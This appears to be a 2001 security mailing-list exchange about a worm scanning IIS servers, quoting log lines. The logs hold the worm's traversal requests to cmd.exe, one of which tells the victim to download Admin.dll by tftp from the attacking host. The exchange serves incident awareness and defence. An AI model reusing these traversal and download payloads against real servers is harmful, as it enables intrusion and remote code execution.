Seeing hits from this new worm, looks like it tries circa 30 URLs.
Logic looks similar to Code Red II/III, in that most hits are coming from similar class B and C networks.
Not sure of payload though as we're protected.
Regards,
Luke Butcher
Em: [EMAIL PROTECTED]
> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
> Sent: Tuesday, September 18, 2001 5:50 PM
> To: [EMAIL PROTECTED]; [EMAIL PROTECTED];
> [EMAIL PROTECTED]
> Cc: [EMAIL PROTECTED]
> Subject: Re: something new afoot, sweeping scans:
>
>
> I haven't been able to get a copy of the worm yet, but
> it scans IIS machines for vulnerabilities able to run
> cmd.exe?\dir+c, then if that works, sends an attempt
> to run tftp back to itself and grab "Admin.dll", then
> run it.
>
> Here are some logs:
>
> Tue Sep 18 09:43:13 2001: 38.214.180.8 -> x.x.1.29: 1888 -> 80 GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Tue Sep 18 09:43:20 2001: 38.214.180.8 -> x.x.1.29: 2460 -> 80 GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2038.214.180.8%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0
> Tue Sep 18 09:43:20 2001: 38.214.180.8 -> x.x.1.29: 2500 -> 80 GET /scripts/..%252f../Admin.dll HTTP/1.0
Nabarro Nathanson
Principal office:
Lacon House, Theobalds Road
London WC1X 8RW
Tel: +44 (0)20 7524 6000 Fax: +44(0)20 7524 6524
